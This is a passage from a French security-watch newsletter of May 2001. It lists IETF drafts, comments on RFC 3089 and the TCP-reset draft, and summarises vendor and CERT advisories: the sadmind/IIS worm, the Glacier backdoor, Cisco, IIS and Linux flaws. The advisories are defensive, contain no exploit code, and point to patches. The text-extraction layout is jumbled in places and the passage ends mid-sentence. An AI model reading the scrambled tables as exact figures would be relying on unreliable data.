draft-ietf-mmusic-sdpng-req-01 draft-taylor-mmusic-sdp-tdm-00 draft-huitema-sdp4nat-00 draft-ietf-seamoby-context-transfer-problem-stat-01 draft-ietf-seamoby-paging-problem-statement-03 SEIVE SIGTRAN SILC SIP SMI SMS SMTP SNMP SONET SPATIAL SPIRITS SSPM STD39 TCP draft-ietf-seamoby-paging-requirements-01 draft-martin-managesieve-03 draft-hou-sigtran-tua-00 draft-riikonen-silc-commands-00 draft-riikonen-silc-pp-02 draft-ietf-sip-isup-01 draft-ietf-sip-isup-mime-10 draft-ietf-sip-overlap-00 draft-levy-sip-diversion-02 draft-rosenberg-sip-sctp-01 draft-schulzrinne-sip-register-01 draft-steenfeldt-sip-serl-fwr-00 draft-ietf-sming-reqs-01 draft-koponen-sms-xml-01 draft-vaudreuil-1983bis-00 draft-ietf-eos-oidcompression-00 draft-ietf-eos-snmpbulk-00 draft-ietf-eos-snmp-rowops-00 draft-ietf-eos-snmpxproto-mib-00 draft-ietf-snmpconf-bcp-05 draft-ietf-snmpv3-coex-v2-00 draft-malis-sonet-ces-mpls-04 draft-tang-spatial-descriptive-location-00 draft-ietf-spirits-architecture-03 draft-kalbfleisch-sspmmib-02 draft-ymbk-std39-historic-02 draft-floyd-tcp-reset-00 Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés 25/04 10/05 15/05 30/04 30/04 21/05 16/05 27/04 18/05 26/04 23/05 08/05 25/04 27/04 10/05 16/05 14/05 27/04 21/05 11/05 18/05 10/05 22/05 30/04 16/05 26/04 24/04 24/04 21/05 07/05 30/04 09/05 01/05 04/05 30/04 11/05 16/05 27/04 27/04 27/04 11/05 16/05 09/05 01/05 25/04 24/04 27/04 18/05 15/05 07/05 21/05 01/05 14/05 27/04 27/04 14/05 26/04 22/05 09/05 21/05 24/04 07/05 17/05 24/04 30/04 26/04 09/05 25/04 25/04 11/05 25/04 27/04 18/05 09/05 17/05 14/05 07/05 IP over Optical Networks: A Summary of Issues Integrated Services across MPLS domains using CR-LDP signaling Multicast Source Discovery Protocol (MSDP) mSLP - Mesh-enhanced Service Location Protocol NNI Path Protection Control Plane Issues The application/ogg Media Type Packet-Optical Escalation Strategies OSPFv2 Metric Auto-Decay OSPF Type 5 to Type 7 Translation RP Relocation Extension to PIM-SM Multicast Routing Transport Protocols for CMP Infor. Model for Describing Network Device QoS Mechanisms Terminology Gene. PPP Flow Control Mechanism for Packet Over SONET Links An Architecture for L2VPNs Printer Finishing MIB Domain Name and Related Definitions Generic Registry-Registrar Protocol Requirements Requirements for Pseudo Wire Emulation Edge-to-Edge (PWE3) Requirements & framework for ATM network internet. over MPLS Framework for Pseudo Wire Emulation Edge-to-Edge (PWE3) Quick Transaction Protocol - QTP Identity Representation for RSVP Framework for session set-up with media authorization RFC1858 is not water-tight RIP Version 2 MIB Extension Resource Management in Diffserv (RMD) Framework Resource Management in Diffserv On DemAnd (RODA) PHR Requirements & assumptions for ROHC 0-byte IP/UDP/RTP Comp Link-Layer Assisted ROHC Over CDMA2000 Comparison of Protocols for Reliable Server Pooling Requirements for Reliable Server Pooling Capability Negotiation: The RSVP CAP Object RTP Payload Format for MPEG-4 Streams RTP Payload Format for Keying-Information Stream (KS) An RTP Payload Format for EVRC Speech RTP Payload Fmt & file Storage Fmt for AMR & AMR-WB audio RTP Interoperability Statement RTP Testing Strategies An RTP Payload Fmt for Generic FEC with Uneven Level Protection SCTP Dynamic Addition of IP addresses Stream Control Transmission Protocol SCTP compatible delivery subsystem SDP: Session Description Protocol Session Description and Capability Negotiation Requirements for Session Description and Capability Negotiation Conventions for the use of the SDP for Digital Circuit Connections RTCP attribute in SDP Reasons For Performing Context Transfers Between Nodes in an IP Dormant Mode Host Alerting ('IP Paging') Problem Statement Requirements for an IP Mobile Node Alerting Protocol A Protocol for Remotely Managing Sieve Scripts SS7 TCAP-User Adaptation Layer (TUA) SILC Commands SILC Packet Protocol ISUP to SIP Mapping MIME media types for ISUP and QSIG Objects Mapping of ISUP Overlap Signalling to SIP Diversion Indication in SIP SCTP as a Transport for SIP SIP Registration SIP Service Execution Rule Language Framework and Requir. SMIng Requirements XML encoding for SMS messages Enhanced Mail System Status Codes SNMP Object Identifier Compression Efficient Transfer of Bulk SNMP Data SNMP Row Operations Extensions SNMP Extended Protocol MIB Configuring Networks and Devices with SNMP Coexistence between V1, V2, V3 of the Internet SNMP Framework SONET/SDH Circuit Emulation Service Over MPLS Encapsulation Common Syntax and Coding for Descriptive Location The SPIRITS Architecture Def. of MIB for Synthetic Sources for Performance Monitoring alg. Request to Move STD 39 to Historic Status Inappropriate TCP Resets Considered Harmful Page 19/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 TFRC TRIP UMPS UNIVERS URN VPIM WCIP WEB WEBDAV WIRELES XCAST draft-ietf-pilc-2.5g3g-01 draft-ietf-pilc-asym-04 draft-otis-tcp-framing-00 draft-ietf-tsvwg-tfrc-02 draft-ietf-iptel-trip-06 draft-bogdanov-comments-umsp-01 draft-felton-universal-language-01 draft-ietf-urn-rfc2611bis-03 draft-walsh-urn-publicid-01 draft-ietf-vpim-address-01 draft-ietf-vpim-hint-05 draft-ietf-vpim-ivm-goals-02 draft-ietf-vpim-vpimv2r2-02 draft-new-webi-wcip-beep-00 draft-baker-xhtml-media-reg-01 draft-daviel-html-geo-tag-05 draft-daviel-http-geo-header-03 draft-wilson-wrec-wccp-v2-01 draft-ietf-deltav-versioning-15 draft-partain-wireless-issues-00 draft-lee-xcast-ethernet-00 Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés 17/05 18/05 25/04 21/05 21/05 30/04 26/04 08/05 08/05 26/04 24/04 03/05 27/04 03/05 30/04 25/04 25/04 26/04 24/04 24/04 09/05 TCP over 2.5G and 3G Wireless Networks TCP Performance Implications of Network Asymmetry TCP Framing Header TCP Friendly Rate Control (TFRC):Protocol Specification Telephony Routing over IP (TRIP) Comments to the Unified Memory Space Protocol Intern. Language Bridge For Implementing Language Free Svcs URN Namespace Definition Mechanisms A URN Namespace for Public Identifiers VPIM Addressing Message Context for Internet Mail High-Level Requirements for Internet Voice Mail Voice Profile for Internet Mail - version 2 The WCIP Profile The 'application/xhtml+xml' Media Type Geographic registration of HTML documents Geographic extensions for HTTP transactions Web Cache Communication Protocol V2.0 Versioning Extensions to WebDAV Resource Reservation Issues in Cellular Access Networks Xcast over Ethernet Page 20/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 NOS COMMENTAIRES LES RFC RFC 3089 A SOCKS-based IPv6/IPv4 Gateway Mechanism Ce RFC a pour auteur H.Kitamura de la société NEC, société à l'origine du protocole de relayage sécurisé SOCKS®. Conçu dans les années 95 en tant que protocole de relayage et d'accès sécurisé, le protocole SOCKS V4 n'a jamais vraiment connu le succès escompté car imposant une modification substantielle - une opération dénommée 'socksification' - des applications clientes. En revanche, la Version 5, normalisée par l'IETF et spécifiée par le biais de trois RFC (RFC1928, RFC1929 et RFC1961), doit être considérée comme mature et fiable. Elle a donnée lieu à de nombreuses implémentations notamment dans le domaine des applications Internet (dont notamment les navigateurs WEB). L'intérêt du protocole SOCKS V5 réside principalement dans sa simplicité de mise en œuvre et de configuration. SOCKS V5 est désormais couramment employé comme mécanisme de relayage générique et de sécurisation d'applications utilisant un transport TCP ou UDP. Le fonctionnement de ce protocole est rappelé sur le synoptique d'origine NEC présenté ci-contre. Celui-ci fait notamment apparaître les fonctions spécifiques de la V4 présentées dans le cadre dessiné en pointillé. La couche SOCKS installée sur le client dialogue avec le serveur SOCKS pour établir une connexion authentifiée et sécurisée de manière totalement transparente pour l'utilisateur. Le serveur SOCKS établi à son tour une connexion vers l'application en se comportant comme un client. Les données applicative peuvent alors être échangées de par et d'autre sous le contrôle du serveur SOCKS. Référence: http://www.socks.nec.com/aboutsocks.html Le RFC3089 décrit une utilisation du protocole SOCKS V5 quelque peu étonnante quoique parfaitement adaptée de part le positionnement de ce protocol: une passerelle d'interconnexion entre réseaux IP V4 et réseaux IP V6. La figure ci-contre, extraite du RFC, présente le Client C Gateway G Destination D positionnement de chacun des éléments mis en œuvre: +-----------+ (Server) |Application| - Un client 'C' utilisant un client applicatif 'socksifié', +-->+===========+ +-------------+ +-----------+ - Une passerelle 'G' attachée aux deux réseaux par le same -+ |*SOCKS Lib*| | *Gateway* | |Application| API +-->+===========+ +=====---=====+ +-----------+ biais de deux interfaces et des piles protocolaires | Socket DNS| | Socket DNS | | Socket DNS| associées +-----------+ +-------------+ +-----------+ - Un serveur 'D' hébergeant l'application utilisée par le | [ IPv X ] | |[IPvX]|(IPvY)| | ( IPv Y ) | +-----------+ +-------------+ +-----------+ client 'C'. |Network I/F| | Network I/F | |Network I/F| La résolution 'DNS' nécessaire à l'obtention de l'adresse +-----+-----+ +---+-----+---+ +-----+-----+ du serveur 'D' par le client 'C' devra systématiquement | | | | être déléguée à la passerelle. Un client utilisant IP V4 est +=============+ +-------------+ socksified normal en effet dans l'incapacité de traiter une adresse connection connection exprimée au format IPV6. (ctrl)+data data only A cette fin, une adresse virtuelle correspondant au Fig. 1 Basic SOCKS-based Gateway Mechanism serveur 'D' sera réservée dans le plan d'adressage du Client. Quatre combinaisons peuvent être gérées dont deux combinaisons correspondent à la simple interconnexion de deux réseaux similaires: Type CLIENT SERVEUR Caractéristiques A IPv4 IPV4 Simple Interconnexion de réseaux IPV4 B IPv4 IPV6 Mode passerelle IPV4 -> IPV6 C IPv6 IPV4 Mode passerelle IPV6 -> IPV4 D IPv6 IPV6 Simple Interconnexion de réseaux IPV6 Sur le plan de la sécurité, et plus particulièrement de l'authentification et de la confidentialité, ce mécanisme préserve les services offerts par SOCKS entre le client 'C' et la passerelle 'G', et, éventuellement entre cette dernière et le serveur 'D'. Aucun mécanisme de bout en bout n'est cependant assuré. ftp://ftp.isi.edu/in-notes/rfc3089.txt Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 21/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 LES DRAFTS DRAFT-FLOYD-TCP-RESET-00 Inappropriate TCP Resets Considered Harmful Ce document a été écrit pour mettre en garde contre les risques induits par l'utilisation du paquet TCP RESET pour interrompre l'établissement d'une connexion. L'auteur rappelle que de nombreux serveurs WEB et dispositifs de sécurité utilisent de manière inconsidérée ce mécanisme mettant ainsi en danger la capacité d'évolution de l'infrastructure Internet, et plus particulièrement le standard ECN (Explicit Congestion Notification) décrit dans le RFC2481. Au titre d’un principe de précaution, de nombreux dispositifs rejettent en effet toute demande connexion (paquet SYN) pour laquelle l’un des 6 bits d’un champ TCP réservé est positionné (champ TCP ‘Reserved Field‘). Bien que l’historique de cette stratégie ne puisse être établi avec certitude, il semble que l’utilitaire Queso y soit pour quelque chose: destiné à identifier à distance un quelconque équipement par sondage et analyse des réponses, cet utilitaire signe son passage par positionnement de certains bits du champ réservé. Les tentatives d’identification par sondage non sollicité pouvant être considérées comme une atteinte à la sécurité d’un système, un mécanisme préventif a dû rapidement être mis en place par les éditeurs. Ce mécanisme conduit cependant à rejeter sans plus de précaution certains paquets utilisant de manière tout à fait légitime, et désormais normalisée, certains bits du dit ‘champ réservé’. C’est ainsi ainsi le cas du protocole ECN qui utilise les deux derniers bits – 8=CWN (Congestion Window Reduced) et 9= ECN (Echo flag) – dont le rôle exact est précisé dans le RFC2481. L’ACIRI - centre de recherche financé par AT&T et géré par l’ICSI (International Computer Science Institute) –a développé TBIT, un utilitaire destiné à analyser le comportement des piles TCP/IP, et en particulier, les réactions de celles-ci lors de la réception d’un paquet SYN conforme au standard ECN. Les résultats d’une vaste campagne d’analyse portant sur plus de 10 000 sites WEB (en pratique 24 000 pour les tests concernant la compatibilité ECN) ont ainsi fait l’objet d’un rapport technique publié en Février 2001 par l’ICSI sous le titre ‘Identifying the TCP Behavior of Web Servers‘. Le tableau suivant, extrait de ce rapport, présente les résultats concernant les test de compatibilité ECN : Résultats Nombre de serveurs 1 Serveur non compatible ECN 21602 2 Aucune réponse 3 Réponse sous la forme d’un rejet via un paquet RESET 513 4 ECN négocié mais la donnée d’acquittement ne contient pas le drapeau attendu 255 5 ECN négocié, la donnée d’acquittement contient le drapeau attendu (ECN_ECHO) 22 Sur un total de 24030 1638 Le rapport apporte les précisions suivantes concernant l’identité des équipements à l’origine des résultats 2, 3 et 4 : 2 - Majorité de systèmes identifiés comme utilisant AIX, 3 - Plates-formes de type ‘Cisco Cache Director’ (un correctif est désormais disponible), 4 - Majorité de systèmes identifiés comme utilisant un version ancienne de LINUX (noyau < 2.4.x). Ces résultats sont modulés par le faible nombre d’équipements et de systèmes supportant ECN, en dehors toutefois de la dernière version du noyau LINUX. Notons qu’en présence d’un équipement rejetant les connexions contenant les drapeaux ECN, un client ayant le mécanisme ECN activé ne verra plus les sites WEB qu’il voyait auparavant. Ce dysfonctionnement est ainsi constaté depuis quelques temps par les utilisateurs des dernières versions de LINUX. ftp://ftp.nordu.net/internet-drafts/draft-floyd-tcp-reset-00.txt Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 22/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 ALLEER TT TA RT AQ TE QU ES UE SE ES S ET T AT ALERTES GUIDE DE LECTURE La lecture des avis publiés par les différents organismes de surveillance ou par les constructeurs n’est pas toujours aisée. En effet, les informations publiées peuvent être non seulement redondantes mais aussi transmises avec un retard conséquent par certains organismes. Dès lors, deux alternatives de mise en forme de ces informations peuvent être envisagées : # Publier une synthèse des avis transmis durant la période de veille, en classant ceux-ci en fonction de l’origine de l’avis, # Publier une synthèse des avis transmis en classant ceux-ci en fonction des cibles. La seconde alternative, pour séduisante quelle soit, ne peut être raisonnablement mise en œuvre étant donné l’actuelle diversité des systèmes impactés. En conséquence, nous nous proposons de maintenir une synthèse des avis classée par organisme émetteur de l’avis. Afin de faciliter la lecture de ceux-ci, nous proposons un guide de lecture sous la forme d'un synoptique résumant les caractéristiques de chacun des sources d’information ainsi que les relations existant entre ces sources. Seules les organismes, constructeurs ou éditeurs, disposant d’un service de notification officiel et publiquement accessible sont représentés. Avis Spécifiques Constructeurs Réseaux 3Com Cisco Systèmes Avis Généraux Editeurs Systèmes Compaq Indépendants Editeurs Linux Hackers Microsoft HP FreeBSD IBM NetBSD SGI OpenBSD SUN SCO l0pht Netscape rootshell Editeurs Organismes Autres US Autres Aus-CERT AXENT BugTraq CERT ISS @Stake CIAC Typologies des informations publiées Publication de techniques et de programmes d’attaques Détails des alertes, techniques et programmes Synthèses générales, pointeurs sur les sites spécifiques Notifications détaillées et correctifs techniques L’analyse des avis peut être ainsi menée selon les trois stratégies suivantes : # Recherche d’informations générales et de tendances : Lecture des avis du CERT et du CIAC # Maintenance des systèmes : Lecture des avis constructeurs associés # Compréhension et anticipation des menaces : Lecture des avis des groupes indépendants Aus-CERT CERT 3Com Compaq Microsoft BugTraq rootshell AXENT NetBSD Cisco HP Netscape @Stake l0pht ISS OpenBSD IBM Xfree86 SGI Linux SUN FreeBSD CIAC Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 23/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 FORMAT DE LA PRESENTATION Les alertes et informations sont présentées classées par sources puis par niveau de gravité sous la forme de tableaux récapitulatifs constitués comme suit: % Présentation des Alertes EDITEUR TITRE Description sommaire Gravité Date Informations concernant la plate-forme impactée Produit visé par la vulnérabilité Description rapide de la source du problème Correction URL pointant sur la source la plus pertinente Référence % Présentation des Informations SOURCE TITRE Description sommaire URL pointant sur la source d'information SYNTHESE MENSUELLE Le tableau suivant propose un récapitulatif du nombre d’avis publiés pour la période courante, l’année en cours et l’année précédente. Ces informations sont mises à jour à la fin de chaque période de veille. L’attention du lecteur est attirée sur le fait que certains avis sont repris et rediffusés par les différents organismes. Ces chiffres ne sont donc représentatifs qu’en terme de tendance et d’évolution. Période du 21/04/2001 au 23/05/2001 Période Organisme 20 CERT-CA 4 CERT-IN 2 CIAC 14 Constructeurs 8 Cisco 4 HP 2 IBM 0 SGI 1 Sun 1 Editeurs 13 Allaire 6 Microsoft 7 Netscape 0 Sco 0 Unix libres 40 Linux RedHat 13 Linux Debian 9 Linux Mandr. 12 FreeBSD 6 Autres 4 @Stake 1 Safer 0 X-Force 3 Cumul 2001 2000 79 118 12 22 5 10 62 86 43 77 13 13 18 28 7 17 2 12 3 7 41 155 8 32 29 100 2 7 2 16 181 226 40 137 51 66 52 -38 23 25 38 13 10 5 1 7 27 Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Cumul 2001 - Constructeurs SGI 5% IBM 16% Cumul 2000 - Constructeurs Sun 7% Sun 9% SGI 16% Cisco 17% Cisco 30% IBM 22% HP 36% HP 42% Netscape Cumul 2001 - Editeurs Sco 5% 5% Microsoft 70% Cumul 2000 - Editeurs Allaire 20% Netscape 5% Sco 10% Allaire 21% Microsoft 64% Page 24/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 Alertes détaillées AVIS OFFICIELS Les tables suivantes présentent une synthèse des principales alertes de sécurité émises par un organisme fiable, par l’éditeur du produit ou par le constructeur de l’équipement. Ces informations peuvent être considérées comme fiables et authentifiées. En conséquence, les correctifs proposés, s'il y en a, doivent immédiatement être appliqués. BUGZILLA Vulnérabilité dans le script CGI 'bugzilla' Une vulnérabilité dans les scripts CGI de 'bugzilla' permet de faire exécuter du code sur le serveur. Forte 30/04 Bugzilla (version 2.10) sur toute plate-forme supportantles scripts perl CGI et MySQL. Non vérification des paramètres passés en entrée Correctif existant Script CGI http://www.atstake.com/research/advisories/2001/index_q2.html#043001-1 [a043001-1] CERT Apparition et propagation du ver 'sadmind/IIS' Un ver dénommé 'sadmind/IIS' fait son apparition sur l'Internet. Il semble utiliser deux vulnérabilités connues afin de se propager en environnements Solaris et Microsoft IIS. Critique 08/05 Serveurs SOLARIS (version <= 2.7) non patchés et Serveurs Microsoft IIS 4.0 et 5.0 non patchés Utilisation des vulnérabilités présentes dans les services énoncés Correctif existant Services 'sadmind' et 'IIS' http://www.cert.org/advisories/CA-2001-11.html CERT CA Faiblesse d'initialisation des numéros de séquence TCP Le CERT publie, sous la référence CA-2001-09, une alerte au sujet des faiblesses dans la méthode d'initialisation des numéros de séquences des paquets TCP/IP. Forte 01/05 Systèmes dont lJe fonctionnement de la pile TCP n'est pasconforme à la RFC 1948 (ou implémentations Correctif existant Michal Zalewski CA-2001-09 FA-2001-09 équivalentes). Systèmes n'implémentant pas de protocole de communication sécurisé tels qu'IPSec Numéros de séquence TCP/IP Prédiction des ISN (Initial Sequence Numbers) http://razor.bindview.com/publish/papers/tcpseq.html http://www.cert.org/advisories/CA-2001-09.html http://www2.fedcirc.gov/advisories/FA-2001-09.html Informations au sujet du ver 'cheese' Le CERT publie dans une note d'information référencée IN-2001-05 un descriptif du ver baptisé 'cheese'. Forte 17/05 Toute plateforme Linux déjà affectée par le ver 'lion' Exploitation d'une porte dérobée Correctif existant Virus 'cheese' (type ver) http://www.cert.org/incident_notes/IN-2001-05.html IN-2001-05 CIAC Nouvelle porte dérobée 'Glacier' Le CIAC publie, sous la référence L-077, un bulletin d'alerte au sujet d'un nouvel outil d'instrusion 'Glacier', similaire à 'Back Orifice', permettant de prendre à distance le contrôle d'une machine. Critique 30/04 Microsoft Windows NT, NT Server, 95, 98, Me et 2000 Présence d'une porte dérobée Correctif existant Cheval de Troie 'G_server.exe' http://ciac.llnl.gov/ciac/bulletins/l-077.shtml L-077 CISCO Multiples vulnérabilités dans 'CBOS' CBOS, le système d'exploitation de la famille des routeurs Cisco 600 contient de multiples vulnérabilités. Critique 23/05 CBOS versions 2.0.1, 2.1.0, 2.1.0a, 2.2.0, 2.2.1, 2.2.1a,2.3, 2.3.2, 2.3.5, 2.3.7 et 2.3.8 sur Cisco 627, 633, Correctif existant CSCds 16078,30150, 04882, 74567 673, 675, 675E, 677, 677i et 678 1 - Prédiction des ISN 1 – Numéros de séquence TCP 2 - Mauvaise gestion du paquet ICMP 2 - Option 'IP Record Route' 3 - Mots de passe 'exec' 'enable' 3 - Stockage en clair des mots de passe 4 - Requête 'ICMP ECHO REPLY' 4 - Mauvaise gestion du paquet ICMP http://www.cisco.com/warp/public/707/CBOS-multiple2-pub.html Déni de service potentiel induit par BGP4 Un déni de service sur un équipement utilisant BGP4 peut être provoqué à distance en utilisant un attribut spécifique de BGP4 Forte 10/05 Configurations BGP4 avec un IOS de la série 11.CC et dérivés, 11.2 et dérivés, 11.3, 11.3T, 12.0, 12.0S. Gestion d'un attribut NLRI Correctif existant BGP4 http://www.cisco.com/warp/public/707/ios-bgp-attr-corruption-pub.shtml CSCdt79947 Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 25/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 Déni de service dans 'Cisco IOS' Un conflit d'accès dans 'Cisco IOS' peut provoquer (en deux temps) un déni de service sur la majorité des systèmes basés sur cet environnement. Forte 24/05 Cisco IOS versions 12.1(2)T et 12.1(3)T(problème introduit avec la version 12.1(1.3)T) Corruption de la mémoire Correctif existant Conflit d'accès http://www.cisco.com/warp/public/707/ios-tcp-scanner-reload-pub.shtml CSCds 07326 Mauvaises permissions sur les commutateurs CSS 11000 L'accès FTP aux commutateurs Cisco CSS (Arrowpoint) série 11000 n'assure pas les bonnes permissions pour les utilisateurs non privilégiés. Moyenne 18/05 Cisco CSS série 11000 (11050, 11150 et 11800) avec Cisco WebNS inférieurs à 4.01B23s et 4.10B13s Cisco WebNS Mauvaises permissions d'accès FTP Palliatif proposé http://www.cisco.com/warp/public/707/arrowpoint-ftp-pub.shtml CSCdt64682 FreeBSD Débordement de buffer dans 'slrn' Le paquetage 'slrn', permettant de lire les messages recueillis sur un serveur de news, est vulnérable à un débordement de buffer. Forte 23/04 FreeBSD 3.5.1 et 4.2, paquetage 'slrn-0.9.7.0' Débordement de buffer Correctif existant Analyse syntaxique http://www.freebsd.org/security/security.html#adv SA-01:37 HP Droits d'accès incorrects sur 'pcltotiff' Les droits d'accès positionnés par défaut sur l'utilitaire 'pcltotiff' peuvent être exploités pour provoquer un déni de service local. Forte 19/04 HP-UX versions 10.01, 10.10, 10.20 et 10.26 sur HP9000séries 700 et 800 Correctif existant Utilitaire de conversion 'pcltotiff' SGID 'bin' positionné HPSBUX0104-149 http://europe-support.external.hp.com/ Vulnérabilités dans l'environnement 'CDE' sur HP-UX Plusieurs vulnérabilités dans les modules 'CDE' peuvent mener un utilisateur à provoquer un déni de service ou acquérir des privilèges sur les systèmes HP-UX. Forte 22/05 HP-UX versions 10.10, 10.20, 10.24, 11.00, 11.04 et 11.11sur HP9000 séries 700 et 800 Débordement de buffer Correctif existant Modules 'CDE' HPSBUX0105-151 http://europe-support2.external.hp.com/ INNFeed Débordement de buffer dans l'utilitaire 'startinnfeed' Un débordement de buffer peut être exploité pour acquérir localement les privilèges de l'utilisateur 'news' Forte 18/04 INNFeed versions < 2.3.1 en environnement LINUX Slackware <= 7.1 , Mandrake <= 7.0, RedHat <= 7.1 Débordement de buffer Correctif existant Utilitaire 'startinnfeed' http://www.securiteam.com/unixfocus/INNFeed_buffer_overflow__-c_parameter_.html Securiteam IPSWITCH Débordement de buffer dans le service SMTP IMail 6.06 Un débordement de buffer présent dans le service SMTP du produit IMail 6.06 autorise l'exécution distante de commandes sur le serveur Critique 24/04 Confirmé sur IMail 6.06 et probable sur les versions antérieures Contrôle des données Correctif existant Service SMTP http://www.eeye.com/html/Research/Advisories/AD20010424.html AD20010424 Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 26/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 KERBEROS Débordements de buffer dans le service 'ftp' Deux débordements de buffer présents dans le service 'ftp' permettent d'obtenir un accès distant privilégié. Critique 25/04 MIT Kerberos 5 toutes versions Débordement de buffer multiples Correctif existant Démon 'ftpd' http://web.mit.edu/kerberos/www/advisories/ftpbuf.txt MIT LINUX Vulnérabilité dans 'gftp' Une vulnérabilité de type formatage de chaînes de caractère affecte localement le paquetage 'gftp'. Forte 27/04 'gftp' versions inférieures à la 2.0.8Linux Mandrake 7.1, 7.2, 8.0 et Corporate Server 1.0.1Linux Immunix Correctif existant MDKSA-2001:044 2001-70-017-01 6.2, 7.0-beta et 7.0 Fonction 'printf()' Débordement de buffer http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-044.php3 http://www.linuxsecurity.com/advisories/other_advisory-1326.html LINUX DEBIAN Vulnérabilité dans le paquetage 'man-db' L'exploitation locale d'une vulnérabilité de type lien symbolique présente dans l'utilitaire 'mandb' autorise l'écrasement d'un quelconque fichier. Moyenne 08/05 Debian GNU/Linux 2.2 (toutes architectures) Création non sécurisée de fichiers temporaires Correctif existant 'mandb' - options '-c' et '-u' http://lists.debian.org/debian-security-announce-01/msg00058.html DSA-056-1 LINUX MANDRAKE Vulnérabilité dans 'rpmdrake' Une vulnérabilité de type lien symbolique affecte localement le paquetage 'rpmdrake'. Moyenne 27/04 Linux Mandrake 8.0 Création non sécurisée de fichiers temporaires Correctif existant Lien symbolique MDKSA-2001:043 http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-043.php3 LINUX REDHAT Vulnérabilité dans le paquetage 'mount' De mauvaises permissions du fichier d'échange permet à un utilisateur local de lire le contenu de celui-ci. Forte 02/05 Linux Red Hat 7.1 (i386) Mauvaises permissions du fichier d'échange (swap file) Correctif existant Paquetage 'mount' http://www.redhat.com/support/errata/RHSA-2001-058.html 2001:058-04 Vulnérabilités dans le paquetage 'kdelibs' Une vulnérabilité de type lien symbolique affecte localement le paquetage 'kdelibs'. Moyenne 30/04 Red Hat Linux 7.1 (i386) Création dangereuse de fichiers temporaires Correctif existant Paquetage 'kdelibs' http://www.linuxsecurity.com/advisories/redhat_advisory-1335.html 2001:059-03 Mauvaise méthode journalisation dans 'mgetty' Une erreur dans la fonction de journalisation de 'mgetty' ne permet pas la rotation des journaux. Ces derniers peuvent donc être écrasés. Faible 19/04 Red Hat Linux 5.2, 6.2, 7.0, 7.1 Mauvaise méthode journalisation Correctif existant Script 'faxspool' http://www.redhat.com/support/errata/RHSA-2001-050.html 2001:050-04 LINUX SUSE Vulnérabilité dans 'nedit' Un problème de gestion des fichiers temporaires par l'éditeur 'nedit' peut conduire à l'acquisition locale des privilèges de 'root' Forte 19/04 Linux SuSE [6.1, 6.2] 6.3, 6.4, 7.0 et 7.1 et tout autre système utilisant 'nedit' Fichiers temporaires non sûrs Correctif existant Editeur 'nedit' SuSE-SA:2001:14 http://www.linuxsecurity.com/advisories/suse_advisory-1304.html Vulnérabilité dans 'hylafax' Une erreur de conception dans le service de gestion des fax 'hfaxd' peut conduire à l'acquisition locale des privilèges 'root'. Forte 20/04 Linux SuSE [6.1, 6.2] 6.3, 6.4, 7.0 et 7.1 et tout système utilisant le service 'hfaxd' Utilisation non sure de la fonction 'syslog' Correctif existant Démon 'hfaxd' SuSE-SA:2001:15 http://www.linuxsecurity.com/advisories/suse_advisory-1311.html Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 27/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 MICROSOFT Détournement des services dans 'Windows 2000' L'utilisation commune des registres de déboguage peut permettre de détourner un processus afin de se faire passer pour lui. Critique 24/05 Microsoft Windows 2000 (SP1) Registres communs à tous les processus et services Correctif existant Registres de déboguage http://www.guninski.com/dr07.html Guninski #45 Débordement dans l'extension ISAPI sous IIS 5.0 Un débordement de buffer affecte Windows 2000 et IIS 5.0, permettant, à distance, d'exécuter du code sur la machine cible. Critique 01/05 Microsoft Windows 2000 Server, Advanced Server et Datacenter Server avec IIS 5.0 Débordement de buffer Correctif existant Filtre '.printer' ISAPI http://www.microsoft.com/technet/security/bulletin/MS01-023.asp MS01-023 http://www.eeye.com/html/Research/Advisories/AD20010501.html AD20010501 Trois vulnérabilités dans IIS 4.0 et 5.0 Microsoft publie un correctif cumulatif traitant trois vulnérabilités dans IIS 4.0 et 5.0. De plus, il corrige plusieurs erreurs présentes dans des correctifs antérieurs. Critique 14/05 Microsoft IIS 4.0 et 5.0 1 – Contournement des vérifications des requêtes Correctif existant 1 - Décodage de requêtes MS01-026 2 - Mauvaise gestion des requêtes 2 - Globalisation requêtes FTP 3 - Autorisation de connexion FTP 3 - Recherche des domaines http://www.microsoft.com/technet/security/bulletin/MS01-026.asp Plusieurs vulnérabilités dans Internet Explorer Plusieurs vulnérabilités dans le contrôle des certificats affectent le navigateur Internet Explorer. Une exploitation à distance peut entraîner la compromission du système. Critique 16/05 Microsoft Internet Explorer 5.01 et 5.5 1 - Désactivation de certains contrôles Correctif existant 1 - Vérification des CRLs MS01-027 2 - Modification du contenu de la barre d'adresse 2 - Affichage de l'adresse site 3 - Mauvaise vérification de la zone de confiance 3 - Frames http://www.microsoft.com/technet/security/bulletin/MS01-027.asp Exécution de macros 'Word' via les documents RTF Une vulnérabilité dans le processus de vérification de la présence de macros dans les documents RTF peut permettre à un utilisateur d'exécuter du code sur la machine distante via les macros Word. Critique 22/05 Microsoft Word 97 et 2000, 98 (version Japonaise) et Microsoft Word 98 et 2001 pour Mac Correctif existant Document RTF liés à un modèle Présence de macros dans le fichier http://www.microsoft.com/technet/security/bulletin/MS01-028.asp MS01-028 Débordement de buffer dans 'Windows Media Player' Un débordement de buffer affecte à distance 'Windows Media Player' dans le 